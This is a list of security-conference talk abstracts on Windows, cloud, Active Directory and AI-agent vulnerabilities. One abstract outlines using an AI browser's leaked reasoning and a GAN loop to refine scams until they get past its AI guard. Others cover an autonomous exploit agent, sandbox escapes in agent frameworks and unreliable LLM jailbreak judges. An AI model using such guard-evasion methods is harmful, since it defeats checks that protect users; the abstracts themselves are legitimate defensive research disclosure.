In mid-2024, a global IT outage - triggered by a faulty CrowdStrike update - became the largest in history, impacting roughly 8.5 million devices worldwide. In response, Microsoft introduced the Windows Resiliency Initiative (WRI) - a bold vision for a self-healing, secure Windows platform designed to enable rapid recovery and autonomous remediation, ensuring systems can bounce back from failures without user intervention. At the heart of this initiative is the Windows Recovery Environment (WinRE), a foundational component embedded in over a billion devices. Once a simple recovery utility, WinRE is now evolving into the backbone of system resiliency, redefining how Windows safeguards continuity and reliability. Recognizing its growing importance, we conducted an in-depth security review of WinRE - examining its architecture, interactions with other components, prior research, and potential attack surfaces - with the goal of uncovering new vulnerabilities. This review uncovered 11 new CVEs that allow bypassing BitLocker to extract all the BitLocker-encrypted data. Notably, most of the findings were purely logical in nature. In this talk, we will present selected findings from our research, demonstrate how we discovered and exploited new 0-day vulnerabilities, share key lessons learned, and outline our approach to strengthening WinRE’s security. This talk will not only reveal how we uncovered and exploited new vulnerabilities but also serve as a practical guide to WinRE security research - covering its fundamentals, threat model, and essential tools - while sharing lessons learned to inspire the broader security research community to further explore the security of WinRE.
Back to Schedule >>Security operations teams today are loaded by overwhelming volumes of raw telemetry. Transforming this ocean of data into actionable insights, whether during incident response or threat hunting, or when engineering new, advanced detection rules, is a highly manual, time-consuming, and expertise-driven process. While leveraging AI to streamline such investigations is widely discussed, practical, effective methodologies for doing so at scale are rare. It is neither feasible nor effective to simply "ask an LLM" to process billions of records and synthesize knowledge directly. In this session, we introduce a generalizable framework for building a continuous, AI-driven knowledge layer on top of raw security logs. Our approach leverages advanced LLM capabilities - including autonomous tool use and agentic behaviors - with human expert guidance. Attendees will see how LLMs can intelligently sample large log sets, cluster similar data, and generate meaningful abstractions. We will also detail how to construct actual agents capable of autonomously crafting, testing, and refining sophisticated queries - iterating until security objectives and validation checks are satisfied. We will conclude with a real-world demonstration, introducing the "behavioral layer": an AIderived, continually updated abstraction that transforms otherwise opaque security telemetry into plain English summaries, complete with MITRE ATT&CK mapping. This work empowers security teams to elevate triage, detection engineering, and investigation - without the prohibitive cost and bottleneck of continuous manual abstraction
Back to Schedule >>MS-DOS is dead. Except when it’s not — when it’s still running a real business workflow, or when the only copy of critical data lives inside a weird, password‑locked format from 1992. Ever wondered what an MS-DOS program actually does under the hood? How memory and OS services worked before user/kernel-mode separation, and what “crypto” and “security” looked like when your whole world was INT 21h, TSRs, and raw bytes? In this talk we will demonstrate - through two real-life cases we encountered - how to unpack, reverse-engineer, debug and patch two MS-DOS based programs -“The QText Diaries.” We recovered access to a trove of password‑locked documents from a 1992 Hebrew/English word processor by identifying classic DOS packers, reconstructing the key‑derivation flow from disassembly, and extracting the original plaintext password to decrypt files. Along the way we’ll ask an uncomfortable archival-security question: how do you protect a backup that must still be readable 40 years later — and can “strong encryption” stay strong when the tooling, platforms, and assumptions rot? “The Impossible Saga.” A 1998 Clipper/xBase legal case‑management system rendered dates incorrectly - making the software unusable past January 1st 2026. We’ll show how we mapped the date code paths, located the formatting logic, and fixed it with a single‑byte patch—then validated it in a real-life deployment that still depends on it today. You’ll learn why DOS extenders turn “simple reversing” into a rabbit hole of protected-mode memory maps, overlays, and debugger-hostile weirdness — and how platforms like Clipper/xBase actually behaved in the wild. You will also see how modern emulators, virtualization, and automation make this only marginally easier: faster iteration, better snapshots, same ancient tricks — and how digging through obscure corners of the internet can make (or break) your research."
Back to Schedule >>What happens when you try to teach an AI to think like a pentester? I spent the last year building Kira, an agentic AI security researcher that achieved over 80% autonomous success against industry-standard vulnerable applications - with zero pre-existing knowledge of the targets. This talk isn't about the hype. It's about what broke, what surprised me, and the uncomfortable questions that emerge when your AI starts chaining multi-stage exploits without being explicitly told how. You'll see: Real exploit chains Kira discovered autonomously (and the catastrophic failures); The ""aha"" moments that separated pattern-matching from actual reasoning; Safety guardrails we built (and the ones we had to retrofit after... incidents); Why certain vulnerability classes still require cognitive leaps traditional tools can't make. This is a technical deep-dive into training an AI red-teamer - complete with failure cases, ethical constraints, and the architecture decisions that made autonomous exploitation possible while (mostly) staying inside responsible boundaries. Target audience: Offensive security researchers, red teamers, AI security practitioners, and anyone curious about the messy reality of building autonomous exploit systems.
Back to Schedule >>AI Browsers don’t just browse for us, they think out loud, leaking their reasoning, decisions, and security blind spots straight into our hands. By sniffing and analyzing this stream of internal logic, we gained a first-of-itskind view into how AI Browsers actually think and perceive the web. That insight quickly triggered our “BlackHat” instincts: we connected this data to another generative AI agent and ended up building the ultimate scamming machine. One that produces working, AI-guard-bypassing scams in minutes. One AI agent systematically scamming another, leaving us humans entirely out of the loop. In this talk, we show how tapping into AI Browser internals exposes predictable and abusable security blind spots, and how we weaponized this visibility using a GAN (Generative Adversarial Network). Instead of generating images like in "old times", this GAN iteratively tests how AI Browsers detect scams and socialengineering traps. Red flags noticed, or more critically, *missed, become the GAN’s training signal, allowing it to refine attacks until the browser reliably fails. And when one AI Browser fails, it takes down every human relying on it. When our first GAN execution finished in under four minutes, the implication became clear: as AI Browsers go mainstream, attackers will be able to “GAN” perfect scams: no guessing, no fuzzing, no “spray and pray.” Just generate, test, exploit, repeat. To defend ourselves in an AI-browsed world, we must start thinking like attackers, and first things first: make AI Browsers stop talking so much.
Back to Schedule >>AI agent frameworks have rapidly become critical infrastructure, powering everything from chatbots to autonomous coding assistants. But in the rush to ship agentic AI, have we forgotten the security lessons of the past two decades? This talk presents findings from Cyata's ongoing research into agentic identity and AI agent security, including the first disclosure of multiple CVEs across popular AI agent frameworks, alongside the already-public LangGrinch (CVE2025-68664). From deserialization injection to SQL injection, from sandbox escapes to SSRF, from stored XSS to integer overflows - it's déjà vuln, the classic vulnerabilities are now hitting AI agents. You will leave with a clear understanding of the emerging agentic attack surface and practical guidance for securing AI agent deployments.
Back to Schedule >>HTTP/3, the latest version of the HTTP protocol, is one of the new protocols in town. Does anyone use it? Well, more than 35% of all internet-facing websites do! HTTP/3 over QUIC, originally developed by Google, has taken security seriously, which is reflected in its RFC. In this session, we will share HTTP/3's main features and dive into its internals, then share our research journey, including some of our attack scenarios. One of HTTP/3's most promising features is its ability to solve Head-of-Line (HOL) blocking, ensuring each request has its own stream (to minimize bottlenecks between requests), leading to requests cannot block each other on the same stream. Does it mean that race conditions are impossible in HTTP/3? In the session, we will cover our journey to overcome these limitations and "Make Fuzzing and Race Conditions Work in HTTP/3". During our research, we found that the level of tooling for HTTP/3 security testing, fuzzing, and particularly race conditions testing, is lacking; therefore, we developed our own open-source tool, QuicDraw. Finally, we will demonstrate using QuicDrawUI and exploiting a 1-day race condition on a well-known identity provider hosted on a well-known cloud provider (over HTTP/3 :)) Attendees will be armed with the theory and tools required for their own HTTP/3 and QUIC research.
Back to Schedule >>Had you ever wondered what happens when a CPU vulnerability is disclosed to the vendor? CPU is the foundation of computing. If CPUs are insecure the entire stack is insecure. Also CPUs are Hardware, with a published ISA and a set of features. Breaking compatibility is not an option. So – how do we do it? We will give a behind the scenes guided tour to the full cycle CPU security process, based on a vulnerability reported to us a few years ago (Plundervolt). As with every vulnerability, we need to validate where we are vulnerable. But unlike software, we need to understand what goes on below the software. If things were not hard enough, there are also multiple hardware configurations and CPU generations that need to be checked on. As these are physical devices, some „hacks“ were required to scale and automate. Afterwards – we need to evaluate the risk to make the appropriate mitigations – or enable path for defeature, when it effects sensitive flows. For example – certain vulnerabilities (like Plundervolt) are only mitigated for confidential computing, as kernel access is an attack requirement. Other vulnerabilities, we share suggestions and recommendations with operating systems and ecosystem partners on how to apply mitigations in code. And some vulnerabilities require a strong cooperation between Hardware and our Software partners. Then we will deep dive into the microcode patching process, it’s limitations and how we test, patch and validate mitigations. To close – we will share with you how we proactively work on this kind of issues – from simulation, fuzzing, directed tests and „hacking“ the infrastructure.
Back to Schedule >>AI-first IDEs sit at the intersection of code execution, developer trust decisions, and high-privilege credentials. As these tools add agentic features, they increasingly behave like privileged automation, and any weakened trust boundary becomes exploitable. In the talk we will present original research on how disabling VS Code’s Workspace Trust model. We demonstrate how this shifts the IDE’s security posture: opening a repository can trigger unintended execution paths, enabling persistence, secret discovery, and lateral movement into cloud environments. We map the kill chain from repository delivery to credential access and cloud pivoting, highlighting where traditional controls often fail to catch IDE-native execution.
Back to Schedule >>Cloud-focused malware is often noisy, opportunistic, and short-lived. Frequently limited to test or research projects, with narrow capabilities and unstable implementations. VoidLink is neither. VoidLink is a newly uncovered, Chinese-developed malware built as a modular framework designed to evolve. Our analysis reveals an unusually clear maturation curve. What initially appears to be a year of active development with multiple iterations is, in fact, a complete, production-level malware framework written by AI, in couple of weeks. At its core, VoidLink looks like an attempt to build a full-featured Chinese alternative to modern commercial C2 ecosystems, heavily inspired by Cobalt Strike style workflows. It combines kernel and cloud tradecraft into a single platform, including kernel-level components (LKM), eBPF-based mechanisms, cloud credential theft, and an ecosystem of 30+ capability modules. In this talk, we present an end-to-end teardown of VoidLink from three perspectives: the malware’s technical architecture, the operator’s workflow, capabilities OPSEC mistakes, and the developer’s perspective, including how large language models were used to design and build an entirely new malware framework.
Back to Schedule >>As organizations rapidly adopt AI frameworks and third-party components, traditional software vulnerabilities are increasingly being introduced into AI infrastructure. While AI security discussions often focus on model level issues such as prompt injections, the most dangerous risks frequently arise from traditional software vulnerabilities within the frameworks that power AI systems. In this talk, we will present two vulnerabilities we discovered in Chainlit, a widely used open-source framework that helps building conversational AI apps (CVE-2026-22218 and CVE-2026-22219). The issues affect internet-facing AI systems and can be triggered remotely, enabling attackers to steal sensitive files, leak cloud API keys and secrets, and perform server-side request forgery (SSRF) on the AI framework server. We confirmed the vulnerabilities in real world, internet facing applications used by major enterprises, demonstrating how a framework layer vulnerabilities can escalate to cloud level impact. We will walk through the technical details of the vulnerabilities and the exploitation chain that leads to server compromise and credential exposure. We’ll also show how leaking artifacts such as cached conversation history, configuration files, or environment variables can reveal highly sensitive enterprise data.
Back to Schedule >>In this talk we will explore the novel attack surface of Hybrid Clouds that contain both on-prem and cloud elements. Starting from an overview of Arc, exploring its unique features that introduce new primitives and demonstrating our research approach to this domain. We will focus on vulnerabilities introduced by Arc Extensions, a crucial backbone of connecting edge machines to the cloud, and deep dive into four RCE and EoP vulnerabilities our team discovered (CVE-2025-47988, CVE-2025-53729, CVE-2025-59494 and CVE- 2026-21224). You’ll leave this talk with a better understanding of this unique architecture, the new services introduced and the complexities that come with adding cloud concepts to the on-prem environment.
Back to Schedule >>Specialized inference servers are essential for organizations to scale AI deployments and maximize hardware utilization (GPU/TPU/CPU). In the largely open-source AI ecosystem, and especially with large models, these servers require distributed engineering, which introduces a new kind of risk. We found and reported multiple Remote Code Execution (RCE) vulnerabilities targeting essential communication channels within all major AI inference servers and proved that many of them are internet facing. Alarmingly, the best practices include critical logical flaws that were spread via code reuse across famous open source platforms such as Meta, NVIDIA, Microsoft, and even PyTorch projects such as vLLM, SGLang which are in use by affecting thousands of enterprise workloads. In this talk, we'll reveal, for the first time, the full technical POC details of the RCE vulnerability and the disclosure process with the vendors. Join our critical case study on AI supply chain shadow risks, security vs. performance trade-offs, and code reuse dangers – vital lessons for implementing AI securely.
Back to Schedule >>Golden dMSA is a post-exploitation and privilege escalation method that exploits vulnerabilities in Managed Service Accounts (MSAs) within Active Directory forests. This attack enables adversaries to obtain Kerberos tickets and derive passwords for all domain-managed service accounts (dMSAs) and group-managed service accounts (gMSAs) across the forest by temporarily compromising a single domain. Domain-managed service accounts are designed as enhanced MSAs with strengthened security controls. By design, non-privileged users should lack the permissions to enumerate these protected accounts. However, this attack method bypasses these restrictions, allowing unauthorized enumeration of dMSA and gMSA accounts from standard user privileges. Once an attacker gains control of any domain within the forest, they can leverage extracted cryptographic material and domain-specific data to algorithmically predict and reconstruct the passwords of all managed service accounts, effectively compromising the entire forest's service account infrastructure.
Back to Schedule >>How can we tell when AI is being used, especially when exceptional results could be entirely human? As AI systems now routinely produce top-level work, exceptional performance alone no longer reveals how something was created. A handful of brilliant answers—or even a single outstanding result—can be misleading in both directions: they might look like AI but be human, or look human but be AI. Chess offers a unique lens on this problem. It's one of the few domains where human and machine decision-making can be compared move by move, and where anti-cheating systems have matured over years encountering this problem. These systems have learned a crucial lesson: you cannot judge a player by a handful of brilliant moves in a single game. Instead, they assess how performance behaves across many decisions—how it varies with difficulty, how it degrades under pressure, and what patterns of error emerge over time. As a competitive chess player, I've seen firsthand that detection isn't about identifying forbidden moves, but about understanding behavior across sequences. Machines and humans don't reveal themselves in snapshots—they reveal themselves in patterns. This lens reframes AI detection as a familiar question. Instead of asking whether an output is impressive or suspicious, we ask: does it reflect the tradeoffs, constraints, and irregularities that characterize human thinking? This talk explores what chess anti-cheating can teach us about detecting AI use in other domains, and what "human" actually looks like when measured at scale.
Back to Schedule >>In 2025, coercion has become a valid primitive for lateral movement and privilege escalation. Whether it is attackers targeting Domain Controllers or pivoting through networks, forcing authentication is a key to bypassing traditional perimeters. We will map the current state of coercion attacks, from RPC interface abuse (MS-EFSRPC, MS-RPRN & more) to complex DCOM object activation and WebClient abuse. We will explore how these methods differ and how the landscape is evolving with the resurgence of reflection attacks (CVE-2025-33073 & CVE2025-54918). Attendees will leave with an understanding of the coercion attack surface, understanding not just 'what works', but how these primitives relate to one another and how to detect the broader behavior rather than just the tools.
Back to Schedule >>GitHub Actions is broken. Attackers can now enjoy an RCE-as-a-service vector that can lead to significant downstream effects. In this talk, you will learn how I managed to compromise the repositories of Google, Microsoft and other Fortune-100 companies, simply by creating a pull request from a fork.
Back to Schedule >>Security Operations Center (SOC) analysts still spend significant time manually documenting their investigation steps, notes that are essential for handoff, audit, and incident reconstruction but are often incomplete under pressure. Existing approaches summarize alerts or case artifacts but rarely capture the investigation process itself. We introduce a methodology for reconstructing SOC investigations using Multimodal Web Telemetry, a novel technique that automatically captures analyst activity by observing DOM mutations, UI transitions, and interaction events within web-based security tools. Using web app activity capturing tool, the system passively collects structural and visual signals and re-renders them into a unified representation, converting HTML artifacts into Markdown and aligning them with event traces to form a multimodal timeline. A generative model processes this telemetry post-hoc to produce coherent, human-readable investigation notes that maintain rolling context across analysts and shifts. While demonstrated in Microsoft Defender, the approach generalizes to any web-based SOC platform without backend integration. We present the architecture, an evaluation framework for measuring reconstruction quality, and practical lessons learned. We also discuss how this methodology enables new research directions, including autonomous investigation agents, SOC-aware recommenders, and large-scale datasets for playbook and SOP generation.
Back to Schedule >>Azure access control relies on two interconnected systems: Entra ID for identity and RBAC for authorization. While often discussed separately, understanding their relationship is essential for building a more secure organization. This talk provides a foundational overview of how these systems evolved, how they work together, and where attackers find opportunities to move between them.
Back to Schedule >>Peripheral drivers often fly under the security radar -- and sometimes that blind spot leads straight into physical memory. In this talk, I will present a vulnerability in a card‑reader driver that allows non‑privileged user‑mode applications to gain access to the DMA controller. Besides the obvious security implications --including unrestricted access to kernel memory and cheat development -- the vulnerability provides a surprisingly powerful tool for memory research, enabling experiments with memory‑mapped devices, the IOMMU, and other low‑level components that normally can’t be explored without specialized hardware drivers. The core challenge in exploiting this issue is that the DMA controller operates exclusively on physical addresses, while user‑mode code has no visibility into the physical memory layout. I’ll explain how this gap can be bridged to enable access to arbitrary memory regions, highlight several aspects and side effects of the controller’s programming, and demonstrate it in action.
Back to Schedule >>In a microcontroller, the Mask ROM is a read only memory which is programmed at manufacturing time. Bits cannot be later changed, but they can be seen under a microscope. These are often used for boot memories or cryptography lookup tables. In this two-hour workshop, you will begin with a die photograph of the CPU from the 1989 Game Boy console. Using the instructor's open source MaskRomTool software, you will mark rows and columns of bits, then teach the software to recognize the difference between ones and zeroes. By the end, you will have produced a disassembly of the ROM, allowing you to read the code that display's the trademarked logo at startup. Students should bring a recent Windows or macOS laptop. A mouse and some knowledge of assembly language are recommended but not required.
Back to Schedule >>Cloud adoption, hybrid work, and now the rapid integration of AI are reshaping the fundamental mechanics of modern intrusions. Attackers operate with a one-to-many mindset, exploiting the smallest weakness to scale impact across identities, endpoints, SaaS, cloud control planes — and increasingly AI-powered workflows. As organizations adopt new technologies faster than security teams can harden them, adversaries inherit more attack surface and a dramatically larger blast radius. In this hybrid reality, standard lateral movement is now paired with vertical movement between on-prem and cloud environments, enabling attackers to traverse multiple architectural layers and abuse misconfigurations, privilege gaps, and identity relationships. AI adoption compounds this: new automation pipelines, service accounts, model-hosting environments, and data flows introduce fresh pivot points for attackers who are already skilled at chaining misconfigurations into high-impact compromise. Drawing on hundreds of deep investigations using Microsoft Defender’s cross-domain visibility, this session exposes how attackers weaponize identity, cloud privilege escalation, and architectural fragmentation to achieve both rapid extortion and long-term persistence. We’ll deep-dive into three real attacks — spanning cybercrime and nation-state operations — that illustrate how hybrid and AI-adjacent environments are exploited in practice. Rather than re-stating familiar TTPs, this talk presents a fresh perspective on the new physics of modern intrusions: how accelerating tech adoption expands attacker opportunity, how hybrid identity and cloud relationships create graph-shaped attack paths, and why defense must now leverage AI to reason across these complex, multi-domain relationships. Attendees will leave with a sharper, forward-looking mental model for the defense challenges — and opportunities — emerging in the cloud-AI-hybrid era.
Back to Schedule >>As cybersecurity professionals, our understanding of malware threats is constantly evolving. In this presentation, we will analyze the StealC infostealer, focusing on a recently leaked web panel. We will explore its fundamental functionalities and reveal a significant Cross-Site Scripting (XSS) flaw that allows for session hijacking. By leveraging this vulnerability, we were able to gather data on the operators of the StealC malware. The core of our discussion centers on a particular operator. Through our investigation, we identified various pieces of data gaining insights into the operator's methodologies and targets. We will also explain the implications of the XSS in terms of privacy and show how it helped us trace the operator’s likely country of origin, and even what computer they use
Back to Schedule >>This session presents a forward-looking exploration into modern identity detection by leveraging the latest advancements in Windows Event Tracing for Windows (ETW). security researchers, SOC analysts, and threat hunters will discover how recent enhancements in Windows event logging revolutionize the detection and investigation of sophisticated Active Directory attacks in on-premises environments. The presentation covers critical topics such as detecting DCSync operations, monitoring Group Policy Object changes, investigating LDAP activity, and uncovering Kerberos-based attack techniques. Practical strategies will be shared for integrating these new event sources into existing workflows, empowering defenders to strengthen incident response and proactively counter evolving threats. Participants will leave equipped with actionable insights to enhance their security posture and effectively tackle real-world adversaries targeting modern Active Directory infrastructures.
Back to Schedule >>Large language models are increasingly used as automated judges to detect jailbreak attempts, classify prompt-injection attacks, and enforce GenAI security policies. In practice, their impact is often dominated not by catching attacks, but by the noise they introduce. These LLM-as-a-judge systems are commonly treated as reliable and objective, yet in real deployments they generate substantial false positives that directly affect security workflows. In this briefing, we present an empirical evaluation of several state-of-the-art LLMs used as jailbreak detectors on real production data. We show that these systems exhibit consistent instability: identical prompts are classified differently across models, repeated evaluations by the same model yield conflicting results, and even highly prescriptive, overfitted evaluation prompts fail to eliminate variance. As a result, the judge itself becomes a source of bias and decision drift. We conclude with concrete lessons for defenders, focusing on how to evaluate, test, and operationally constrain LLM-based judges to reduce noise and improve reliability in practice.
Back to Schedule >>Why do we need to put AI in yet another piece of software? Because current web crawlers are just not good enough. In 2026, crawlers are sophisticated, using headless browsers to render SPAs and keeping track and deduping endpoints. But crawlers still can't solve two hard problems. The first is authentication, they rely on humans to handle authentication flows and MFA. The second is ""do no harm"", the crawler doesn't care what exists on an endpoint and will happily ""click"" on logout, delete, wipe and every other feature on the website. Both of these complicate the life of any web security researcher. I present Crawli, a new crawler that works hand in hand with an LLM to handle both of these problems, improving coverage in real world challenges. The talk will cover the challenges, a new architecture and results.
Back to Schedule >>Cloud-scale vulnerability triage is dominated by volume, ambiguity, and fast-changing infrastructure. In Microsoft Azure Networking, engineers must assess vulnerabilities across a diverse network fleet by correlating inconsistent free-text vendor advisories with internal inventory, device configurations, and live telemetry. Manual triage is slow, inconsistent, and toil-heavy, and often requires repeated re-triage as advisories and environments evolve. This talk presents NOVA (Network-agent Orchestrator for Vulnerability Analysis), a production system that automates end-to-end triage through deterministic, multi-agent orchestration inside Azure. NOVA coordinates 50+ task-specialized AI agents to interpret advisories, evaluate exploit conditions, map exposure to live environment data, and recommend mitigations. Instead of ad hoc prompting, NOVA enforces a deterministic, schema-validated workflow, while multi-agent refinement improves precision and reduces hallucinations. NOVA uses LLM inference to determine and explain vulnerability under specific exploit conditions — something brittle pattern-matching and queries can’t do reliably. NOVA synthesizes vendor PSIRTs, NVD updates, scanner outputs, internal inventory, historical triage records, configurations, and telemetry to generate a report that surfaces the key evidence engineers need: whether the issue applies, why, what is impacted, and what to do next. A continuous monitoring feed triggers (and re-triggers) triage when advisories change or new evidence appears. We share what it takes to operationalize agentic vulnerability triage in production, including measured results: >90% reduction in triage time and ~97% classification accuracy, plus approaches to measuring agent accuracy reliably in real-world deployments.
Back to Schedule >>In a microcontroller, the Mask ROM is a read only memory which is programmed at manufacturing time. Bits cannot be later changed, but they can be seen under a microscope. These are often used for boot memories or cryptography lookup tables. In this two-hour workshop, you will begin with a die photograph of the CPU from the 1989 Game Boy console. Using the instructor's open source MaskRomTool software, you will mark rows and columns of bits, then teach the software to recognize the difference between ones and zeroes. By the end, you will have produced a disassembly of the ROM, allowing you to read the code that display's the trademarked logo at startup. Students should bring a recent Windows or macOS laptop. A mouse and some knowledge of assembly language are recommended but not required.
Back to Schedule >>